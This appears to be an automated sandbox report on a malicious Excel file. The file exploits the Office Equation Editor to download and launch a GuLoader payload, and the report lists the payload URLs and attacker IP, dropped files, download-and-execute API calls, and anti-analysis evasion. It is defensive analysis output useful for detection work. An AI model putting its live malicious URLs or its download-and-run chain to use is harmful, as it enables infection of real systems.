Code function: 4_2_708A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_708A1BFF

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nszEA61.tmp\System.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0342056E

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 0000000003A6116E second address: 0000000003A6116E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCA090E82A3h 0x00000006 cmp cx, 133Bh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d cmp al, E6h 0x0000000f rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 852

Thread sleep time: -360000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406850 FindFirstFileW,FindClose,	4_2_00406850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C26
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000004.00000002.1176666558.00000000009EF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_708A1BFF

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03420677 mov edx, dword ptr fs:[00000030h]

2_2_03420677

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040350A

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.149.13.182	unknown	unknown		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.149.13.182/365space/.svchost.exe	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://nordship.ru/bin_XpSIjvlBS226.bin"}

Multi AV Scanner detection for submitted file

Source: OR17233976_00019489_20170619154218.xlsx	Virustotal: Detection: 40%			Perma Link
Source: OR17233976_00019489_20170619154218.xlsx	ReversingLabs: Detection: 24%

Antivirus detection for URL or domain

Source: http://103.149.13.182/365space/.svchost.exe

Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 103.149.13.182 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406850 FindFirstFileW,FindClose,	4_2_00406850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C26
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03420652 ShellExecuteExW,ExitProcess,	2_2_03420652
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_0342056E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034205F1 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_034205F1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034204C9 ExitProcess,	2_2_034204C9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034204E2 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_034204E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03420670 ExitProcess,	2_2_03420670
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034204FE URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_034204FE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03420588 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03420588
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0342063B ShellExecuteExW,ExitProcess,	2_2_0342063B

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 84MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://nordship.ru/bin_XpSIjvlBS226.bin

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0342056E

Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182

Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/365space/.svchost.exe
Source: EQNEDT32.EXE, 00000002.00000002.973889166.0000000003420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/365space/.svchost.exej
Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/365space/.svchost.exemmC:
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsig
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: vbc.exe, 00000004.00000000.969965123.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.1176452278.000000000040A000.00000004.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globals)
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, AEGISIIINVHelper.dll.4.dr, vbc.exe.2.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.9
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, AEGISIIINVHelper.dll.4.dr, vbc.exe.2.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EF2157.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0342056E

Source: global traffic

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

4_2_004056BB

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

4_2_0040350A

Detected potential crypto function

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A1BFF

4_2_708A1BFF

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: .svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file contains more sections than normal

Source: wxbase30u_xml_gcc_custom.dll.4.dr

Static PE information: Number of sections : 12 > 10

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: OR17233976_00019489_20170619154218.xlsx	Virustotal: Detection: 40%
Source: OR17233976_00019489_20170619154218.xlsx	ReversingLabs: Detection: 24%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040350A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$OR17233976_00019489_20170619154218.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR703F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/26@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404967

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

